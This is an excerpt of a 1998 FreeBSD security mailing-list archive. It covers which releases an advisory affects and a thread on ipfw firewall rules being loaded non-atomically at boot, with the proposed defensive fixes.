owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does this problem affect 2.2.7-RELEASE? --Brett At 09:44 PM 11/4/98 +0100, Guido van Rooij wrote: >On Wed, Nov 04, 1998 at 09:34:48PM +0100, sthaug@nethelp.no wrote: >> >> Please note that the fragment and fragment.asc files in the SA-98:08 >> directory are in reality the rst-current and rst-current.asc from >> SA-98:07. You probably want to change this. >> > >Yikes! > >Thanks for the notice... >I've corrected it now. > >-Guido > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 14:57:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA24240 for freebsd-security-outgoing; Wed, 4 Nov 1998 14:57:38 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id OAA24233 for ; Wed, 4 Nov 1998 14:57:36 -0800 (PST) (envelope-from sthaug@nethelp.no) From: sthaug@nethelp.no Received: (qmail 13466 invoked by uid 1001); 4 Nov 1998 22:57:24 +0000 (GMT) To: brett@lariat.org Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment In-Reply-To: Your message of "Wed, 04 Nov 1998 15:52:29 -0700" References: <4.1.19981104155202.042f8dc0@127.0.0.1> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Wed, 04 Nov 1998 23:57:24 +0100 Message-ID: <13464.910220244@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Does this problem affect 2.2.7-RELEASE? How about reading the advisory? It says specifically, Affects: FreeBSD 3.0 and FreeBSD-current before the correction date. In other words, it doesn't affect 2.2.7-RELEASE. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 15:35:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA00722 for freebsd-security-outgoing; Wed, 4 Nov 1998 15:35:04 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA00701 for ; Wed, 4 Nov 1998 15:35:01 -0800 (PST) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id QAA22169; Wed, 4 Nov 1998 16:34:42 -0700 (MST) Message-Id: <4.1.19981104161923.041424e0@127.0.0.1> X-Sender: brett@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Wed, 04 Nov 1998 16:20:11 -0700 To: sthaug@nethelp.no From: Brett Glass Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment Cc: security@FreeBSD.ORG In-Reply-To: <13464.910220244@verdi.nethelp.no> References: <4.1.19981104155202.042f8dc0@127.0.0.1> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:57 PM 11/4/98 +0100, sthaug@nethelp.no wrote: >> Does this problem affect 2.2.7-RELEASE? > >How about reading the advisory? It says specifically, > >Affects: FreeBSD 3.0 and > FreeBSD-current before the correction date. > >In other words, it doesn't affect 2.2.7-RELEASE. I read the advisory. Often, problems cover other versions as well as the one(s) mentioned. And, since I'm paranoid, I think it's important to ask. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 15:46:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA03059 for freebsd-security-outgoing; Wed, 4 Nov 1998 15:46:34 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA03048 for ; Wed, 4 Nov 1998 15:46:31 -0800 (PST) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id PAA16485; Wed, 4 Nov 1998 15:46:43 -0800 (PST) (envelope-from jkh@time.cdrom.com) To: Brett Glass cc: sthaug@nethelp.no, security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment In-reply-to: Your message of "Wed, 04 Nov 1998 16:20:11 MST." <4.1.19981104161923.041424e0@127.0.0.1> Date: Wed, 04 Nov 1998 15:46:43 -0800 Message-ID: <16481.910223203@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I read the advisory. Often, problems cover other versions as > well as the one(s) mentioned. And, since I'm paranoid, I Security advisories are generally very careful to mention *every* version covered, an advisory having little value if this piece of information is not accurate. It also avoids a flood of unnecessary "is my release affected?!" messages. :-) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 17:30:35 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA19470 for freebsd-security-outgoing; Wed, 4 Nov 1998 17:30:35 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA19457 for ; Wed, 4 Nov 1998 17:30:18 -0800 (PST) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id UAA04608; Wed, 4 Nov 1998 20:29:58 -0500 (EST) Date: Wed, 4 Nov 1998 20:29:56 -0500 (EST) From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: Robert Watson cc: freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet sneaks by deny all rule? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Nov 1998, Robert Watson wrote: > Chris, > > My guess it is a race condition. The packet arrived between when your > network interface went up, and the ruleset was added. Because your > default policy is deny, it worked fine. However, this does actually bring > interesting risks to mind: as long as the rules are added in numeric > order, and the default policy is deny, you should always get consistent > (if overly draconian) policy during bootup. However, if you have your > ipfw lines not in the rule order, then some allows might be installed in > the list of rules *before* the denies that precede them. In this > situation, the race condition would allow a packet in that should not have > been allowed in. The whole effect is because the installation of ipfw > rules is non-atomic. > > I wondered for a while about the same thing on some of my systems. That is what is happening, as the machine comes up but before the ipfw rules are loaded its receiving packets. Good thing the kernel has the deny all rule in it in addition to my deny all rule or those packets would be sneaking by. I'm assuming anyway that the default deny all policy is catching ALL the packets that slip through BEFORE my rules have a chance to load? Maybe a note should be added to the ipfw man page stating that if you set the default policy to open in the kernel there is a small window between when, rebooting your machine, and the time your ipfw rules load that packets will get through? I'm glad I noticed this now, and without having two deny all rules I never would have. I'll have to think about this one. Chris -- "You both seem to be ignoring the fact that the networking market is driven by so-called 'IT professionals' these days, most of whom can't tell the difference between an ARP and a carp." --Wes Peters ===================================| Open Systems FreeBSD Consulting. FreeBSD 3.0 is available now! | Phone: (402)573-9124 / ICQ # 20016186 -----------------------------------| 3335 N. 103 Plaza, Omaha, NE 68134 FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting, Network Engineering, Security ===================================| http://open-systems.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 00:26:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA03891 for freebsd-security-outgoing; Thu, 5 Nov 1998 00:26:57 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gvr.gvr.org (gvr.gvr.org [194.151.74.97]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA03858; Thu, 5 Nov 1998 00:26:42 -0800 (PST) (envelope-from guido@gvr.org) Received: (from guido@localhost) by gvr.gvr.org (8.8.8/8.8.5) id JAA15969; Thu, 5 Nov 1998 09:26:21 +0100 (MET) Message-ID: <19981105092621.A15959@gvr.org> Date: Thu, 5 Nov 1998 09:26:21 +0100 From: Guido van Rooij To: Brett Glass , sthaug@nethelp.no, security-officer@FreeBSD.ORG Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment References: <11126.910211688@verdi.nethelp.no> <199811041937.UAA12845@gvr.gvr.org> <11126.910211688@verdi.nethelp.no> <19981104214411.A13413@gvr.org> <4.1.19981104155202.042f8dc0@127.0.0.1> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <4.1.19981104155202.042f8dc0@127.0.0.1>; from Brett Glass on Wed, Nov 04, 1998 at 03:52:29PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 04, 1998 at 03:52:29PM -0700, Brett Glass wrote: > Does this problem affect 2.2.7-RELEASE? > No. -Guido To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 01:24:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA10826 for freebsd-security-outgoing; Thu, 5 Nov 1998 01:24:12 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA10811 for ; Thu, 5 Nov 1998 01:24:09 -0800 (PST) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id EAA12255 for ; Thu, 5 Nov 1998 04:24:02 -0500 (EST) Date: Thu, 5 Nov 1998 04:24:00 -0500 (EST) From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: freebsd-security@FreeBSD.ORG Subject: Amazing wonder packet Part 2. In-Reply-To: <19981104112352.B4776@mcs.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ok someone sent me this so I thought I would run it by the list i'll quote the message here: "seeing how /etc/rc.firewall is a shell script, it is reasonable to assume that most ruleset will include small raceable sections where some packets that should be denied will not be. I kludged as bellow: put a '$fwcmd add 1 deny all from any to any' as the first rule and moved the flush command to one line above it. put a '$fwcmd delete 1' right after my 65534 deny all. This should cut the available time for races down substantially. I've seen packets hit the temporary rule but have never seen a magic packet that made it too the last." What do you guys think about this as a possible solution/hack. Short of tearing up ipfw which I don't have the time to do can anyone see this having more negative actions rather than positive ones? Im not really sure what else one could do. Chris -- "You both seem to be ignoring the fact that the networking market is driven by so-called 'IT professionals' these days, most of whom can't tell the difference between an ARP and a carp." --Wes Peters ===================================| Open Systems FreeBSD Consulting. FreeBSD 3.0 is available now! | Phone: (402)573-9124 / ICQ # 20016186 -----------------------------------| 3335 N. 103 Plaza, Omaha, NE 68134 FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting, Network Engineering, Security ===================================| http://open-systems.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 03:10:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA22853 for freebsd-security-outgoing; Thu, 5 Nov 1998 03:10:49 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (p30-max1.wlg.ihug.co.nz [209.78.48.94]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA22848 for ; Thu, 5 Nov 1998 03:10:45 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.8/8.8.7) with SMTP id AAA20901; Fri, 6 Nov 1998 00:09:28 +1300 (NZDT) (envelope-from andrew@squiz.co.nz) Date: Fri, 6 Nov 1998 00:09:28 +1300 (NZDT) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Open Systems Networking cc: freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet Part 2. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There was an earlier post that covered this which I think you haven't read or haven't understood. Assuming that the default policy is to deny all and assuming that rules are added in numerical order, the result of any rule being missing can only be to deny the packet, which should be safe for most purposes. In most cases there's no problem for your solution. I considered building a wrapper for ipfw to simplify firewall specification and allow for some automated dynamic manipulation of the rule table. If you are doing something like this then it might mean that it was easier to do as you suggest than to guarantee that rules be added in numerical order. Probably ipfw is not the building block you'd choose though. Andrew McNaughton On Thu, 5 Nov 1998, Open Systems Networking wrote: > Date: Thu, 5 Nov 1998 04:24:00 -0500 (EST) > From: Open Systems Networking > To: freebsd-security@FreeBSD.ORG > Subject: Amazing wonder packet Part 2. > > > Ok someone sent me this so I thought I would run it by the list i'll quote > the message here: > > "seeing how /etc/rc.firewall is a shell script, it is reasonable to assume > that most ruleset will include small raceable sections where some packets > that should be denied will not be. I kludged as bellow: > > put a '$fwcmd add 1 deny all from any to any' as the first rule and moved > the flush command to one line above it. > > put a '$fwcmd delete 1' right after my 65534 deny all. > > This should cut the available time for races down substantially. I've seen > packets hit the temporary rule but have never seen a magic packet that > made it too the last." > > What do you guys think about this as a possible solution/hack. > Short of tearing up ipfw which I don't have the time to do can anyone see > this having more negative actions rather than positive ones? > Im not really sure what else one could do. > > Chris > > -- > "You both seem to be ignoring the fact that the networking market is > driven by so-called 'IT professionals' these days, most of whom can't > tell the difference between an ARP and a carp." --Wes Peters > > ===================================| Open Systems FreeBSD Consulting. > FreeBSD 3.0 is available now! | Phone: (402)573-9124 / ICQ # 20016186 > -----------------------------------| 3335 N. 103 Plaza, Omaha, NE 68134 > FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net > http://www.freebsd.org | Consulting, Network Engineering, Security > ===================================| http://open-systems.net > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 03:24:59 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA24325 for freebsd-security-outgoing; Thu, 5 Nov 1998 03:24:59 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA24318 for ; Thu, 5 Nov 1998 03:24:57 -0800 (PST) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id GAA04595; Thu, 5 Nov 1998 06:24:45 -0500 (EST) Date: Thu, 5 Nov 1998 06:24:43 -0500 (EST) From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: Andrew McNaughton cc: freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet Part 2. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 6 Nov 1998, Andrew McNaughton wrote: > > > There was an earlier post that covered this which I think you haven't read > or haven't understood. > > Assuming that the default policy is to deny all and assuming that rules > are added in numerical order, the result of any rule being missing can > only be to deny the packet, which should be safe for most purposes. > > In most cases there's no problem for your solution. No my solution is solved as robert said by just having the default policy to deny all, and having my rules numerically ordered as they are now. The point of my post was a solution I was mailed that implemented what robert said in the last part to have rule one deny everything and then remove it when the rules have loaded. This is a fix for those with a policy of default to open in the kernel. My solution is fine since I have deny all as my default policy and a deny all as my last rule. Which should guarantee that my policies are carried out and that nothing sneaks by. I was merely asking if this persons solution is what robert was thinking for those that have a default policy of open. And if it was implemented right. Because most people are not aware of this race condition at all. And I plan on adding this fix to my pages for those who have a default policy to open. So they get the same warm fuzzy feeling as I do with a closed default policy. I just wanted to make sure that the fix I just posted was what robert was talking about and to make sure the solution I posted was on par with what robert said. Thats all. I'm pretty sure it is, but wanted to double check. Chris -- "You both seem to be ignoring the fact that the networking market is driven by so-called 'IT professionals' these days, most of whom can't tell the difference between an ARP and a carp." --Wes Peters ===================================| Open Systems FreeBSD Consulting. FreeBSD 3.0 is available now! | Phone: (402)573-9124 / ICQ # 20016186 -----------------------------------| 3335 N. 103 Plaza, Omaha, NE 68134 FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting, Network Engineering, Security ===================================| http://open-systems.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 03:47:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA26473 for freebsd-security-outgoing; Thu, 5 Nov 1998 03:47:48 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (p30-max1.wlg.ihug.co.nz [209.78.48.94]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA26466 for ; Thu, 5 Nov 1998 03:47:41 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.8/8.8.7) with SMTP id AAA21220; Fri, 6 Nov 1998 00:46:52 +1300 (NZDT) (envelope-from andrew@squiz.co.nz) Date: Fri, 6 Nov 1998 00:46:52 +1300 (NZDT) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Open Systems Networking cc: freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet Part 2. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 5 Nov 1998, Open Systems Networking wrote: > Date: Thu, 5 Nov 1998 06:24:43 -0500 (EST) > From: Open Systems Networking > To: Andrew McNaughton > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: Amazing wonder packet Part 2. > > On Fri, 6 Nov 1998, Andrew McNaughton wrote: > > > > > > > There was an earlier post that covered this which I think you haven't read > > or haven't understood. > > > > Assuming that the default policy is to deny all and assuming that rules > > are added in numerical order, the result of any rule being missing can > > only be to deny the packet, which should be safe for most purposes. > > > > In most cases there's no problem for your solution. > > No my solution is solved as robert said by just having the default policy > to deny all, and having my rules numerically ordered as they are now. > The point of my post was a solution I was mailed that implemented what > robert said in the last part to have rule one deny everything and then > remove it when the rules have loaded. This is a fix for those with a > policy of default to open in the kernel. My solution is fine since I have > deny all as my default policy and a deny all as my last rule. Which should > guarantee that my policies are carried out and that nothing sneaks by. > I was merely asking if this persons solution is what robert was thinking > for those that have a default policy of open. And if it was implemented > right. Because most people are not aware of this race condition at all. > And I plan on adding this fix to my pages for those who have a default > policy to open. So they get the same warm fuzzy feeling as I do with a > closed default policy. I just wanted to make sure that the fix I just > posted was what robert was talking about and to make sure the > solution I posted was on par with what robert said. Thats all. > I'm pretty sure it is, but wanted to double check. If you have a default to open in the kernel then what you suggest does not solve the problem. There's a window between the interface being brought up and the execution of rc.firewall which is going to be vulnerable regardless of what's in rc.firewall. If you're using ipfw as a firewall then you shouldn't be defaulting to open. Defaulting to open is appropriate if you're just using it for traffic counting, or address translation without an assumption that security is provided. root@aniwa# ipfw add 54321 deny all from any to any via ep1 ipfw: warning: interface ``ep1'' does not exist 54321 deny ip from any to any via ep1 root@aniwa# ipfw show [...] 54321 0 0 deny ip from any to any via ep1 [...] Looks like rc.firewall could be run _before_ the interfaces are set up. The warnings could be annoying though. Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 04:07:28 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA00965 for freebsd-security-outgoing; Thu, 5 Nov 1998 04:07:28 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA00960 for ; Thu, 5 Nov 1998 04:07:26 -0800 (PST) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id HAA13505; Thu, 5 Nov 1998 07:07:14 -0500 (EST) Date: Thu, 5 Nov 1998 07:07:13 -0500 (EST) From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: Andrew McNaughton cc: freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet Part 2. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ok its late. I re-read the post about this and now I grawk the whole point behind the comment: "However, if you have your ipfw lines not in the rule order, then some allows might be installed in the list of rules *before* the denies that precede them. In this situation, the race condition would allow a packet in that should not have been allowed in." The fix was inteded for this. And thats exactly what it fixes. I think I can goto bed now. Chris -- "You both seem to be ignoring the fact that the networking market is driven by so-called 'IT professionals' these days, most of whom can't tell the difference between an ARP and a carp." --Wes Peters ===================================| Open Systems FreeBSD Consulting. FreeBSD 3.0 is available now! | Phone: (402)573-9124 / ICQ # 20016186 -----------------------------------| 3335 N. 103 Plaza, Omaha, NE 68134 FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting, Network Engineering, Security ===================================| http://open-systems.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 05:53:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA13996 for freebsd-security-outgoing; Thu, 5 Nov 1998 05:53:07 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA13984 for ; Thu, 5 Nov 1998 05:52:59 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id IAA04789; Thu, 5 Nov 1998 08:52:50 -0500 (EST) Date: Thu, 5 Nov 1998 08:52:50 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Open Systems Networking cc: freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet Part 2. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 5 Nov 1998, Open Systems Networking wrote: > "seeing how /etc/rc.firewall is a shell script, it is reasonable to assume > that most ruleset will include small raceable sections where some packets > that should be denied will not be. I kludged as bellow: > > put a '$fwcmd add 1 deny all from any to any' as the first rule and moved > the flush command to one line above it. > > put a '$fwcmd delete 1' right after my 65534 deny all. > > This should cut the available time for races down substantially. I've seen > packets hit the temporary rule but have never seen a magic packet that > made it too the last." Chris, This is indeed what I had in mind, and it does substantially narrow the window of vulnerability. However, it seems to me after a quick perusal of the /etc/rc* files that it is probably still preferable to have a default deny policy than to use this kludge. There are in fact two different variations on the race attack to be considered: 1) The default policy is 'accept' and 2) The default polic is 'deny' but the rules are added out of order The problem with 1) is that it is possible programs will be loaded in earlier portions of rc.* that might bind network ports prior to the initialization of ipfw. That is, there is a window between the ifconfig portion of rc.network in pass1 and the ipfw behavior -- and if you have ipfw as a loadable kernel module, that might actually be a large window with a debugging kernel due to the linking time. Both rc.serial and rc.pccard run prior to that point (in my rc.* as of some revision of 3.0 from the past month or so). The default rc.* files seems to be fairly well arranged, although I have found one possible vulnerable program: rc.pccard is run prior to the ipfw rules. rc.pccard runs pccardd, which in turn will run other programs when cards are inserted/discovered. One such program is the ISC dhclient if DHCP is used to configure the machine. If ipfw requires a long link time for lkm loading, then pccardd may successfully discover the card before ipfw has been loaded into the kernel. If there is a vulnerability in dhclient (or something else run by pccardd) that your ipfw rules would normally protect you from, then *there is a dangerous window*. Picture: rc.pccard runs pccardd starts rc.firewall runs ipfw.o lkm begins to link into kernel pccard probes card, runs dhclient packet arrives, buffer overflow in dhclient gives root access ipfw.o finishes loading ipfw installs rule to protect against bad packet Needless to say, probably the best fix here is to use the default rule of deny. BTW, another possible nasty is as follows: suppose you have your pccard.conf set up so that it inserts some ipfw rules when a new network interface is found. If this code runs prior to or during the normal ipfw startup, then the rules may not reflect your intent, as *they may be loaded out of order*. This vulnerability applies *even if your default rule is deny*. Picture rc.firewall runs ipfw.o lkm begins to link into kernel pccard probes card, runs ipfw to allow stuff on the new interface that assumes rc.firewall has run to install existing rules bad packet arrives doing nasty things to dhclient or some other pccardd program ipfw.o finishes loading ipfw installs rule to protect against bad packet In this case, you have to assume that the ipfw rules from either pccardd or from rc.firewall *may be installed in any order* so must be idempotent :). In general, the rc.* files seem carefully arranged to forstall the execution of potentially vulnerable code prior to the ipfw rule installation. Clearly, local modifications might circumvent that -- as does the implicit code execution in pccardd that seems to have been overlooked. The problem with 2) is that even if the policy is 'deny' by default, the ipfw command ordering may weaken the policy for a short window during the installation of the policy. The ipfw rule 1 workaround you posted handles this just fine (assuming you avoid any other rule number'd 1). One would of course need to be careful to document that people must *never* use rule 1, or they might end up with the same problem depending on how multiple rules with the same number are handled. So here is another question for those that are more familiar with the kernel IP code. I am concerned about queueing of packets. It is my belief that (probably) as long as no daemons are yet listening on any ports at the ipfw rule installation, then any packets that slip through the rules due to bad ordering or a default policy of 'accept' will in fact be dropped because they are unneeded, and will be processed immediatly: if they have made it to the point where ipfw considers them, they are high enough in the stack that they will be rejected prior to any process execution that might involve loading a program to accept them? I think we are fine, but would like some confirmation of this thought :). The attack I consider is essentially this: rc.firewall runs first few ipfw rules run packet arrives, is accepted by ipfw rest of ipfw rules go in daemon runs packet is grabbed by daemon for its port This also matters for the pccard case I describe above where the rule ordering is munged by the pccardd running ipfw for an inserted interface. Robert N Watson Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 07:37:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA25031 for freebsd-security-outgoing; Thu, 5 Nov 1998 07:37:05 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA25014 for ; Thu, 5 Nov 1998 07:36:52 -0800 (PST) (envelope-from narvi@haldjas.folklore.ee) Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id RAA00651; Thu, 5 Nov 1998 17:35:21 +0200 (EET) Date: Thu, 5 Nov 1998 17:35:20 +0200 (EET) From: Narvi To: Robert Watson cc: Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet Part 2. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 5 Nov 1998, Robert Watson wrote: [snip] One thing that must be considered is that a machine *may* require a period of laxed security after the network has come up. Indeed, the case may be that while the machine uses no network during the "work" phase at all (and has a deny all rule active). > Robert N Watson > > Carnegie Mellon University http://www.cmu.edu/ > TIS Labs at Network Associates, Inc. http://www.tis.com/ > SafePort Network Services http://www.safeport.com/ > robert@fledge.watson.org http://www.watson.org/~robert/ > Sander There is no love, no good, no happiness and no future - all these are just illusions. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 07:42:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA25528 for freebsd-security-outgoing; Thu, 5 Nov 1998 07:42:18 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org 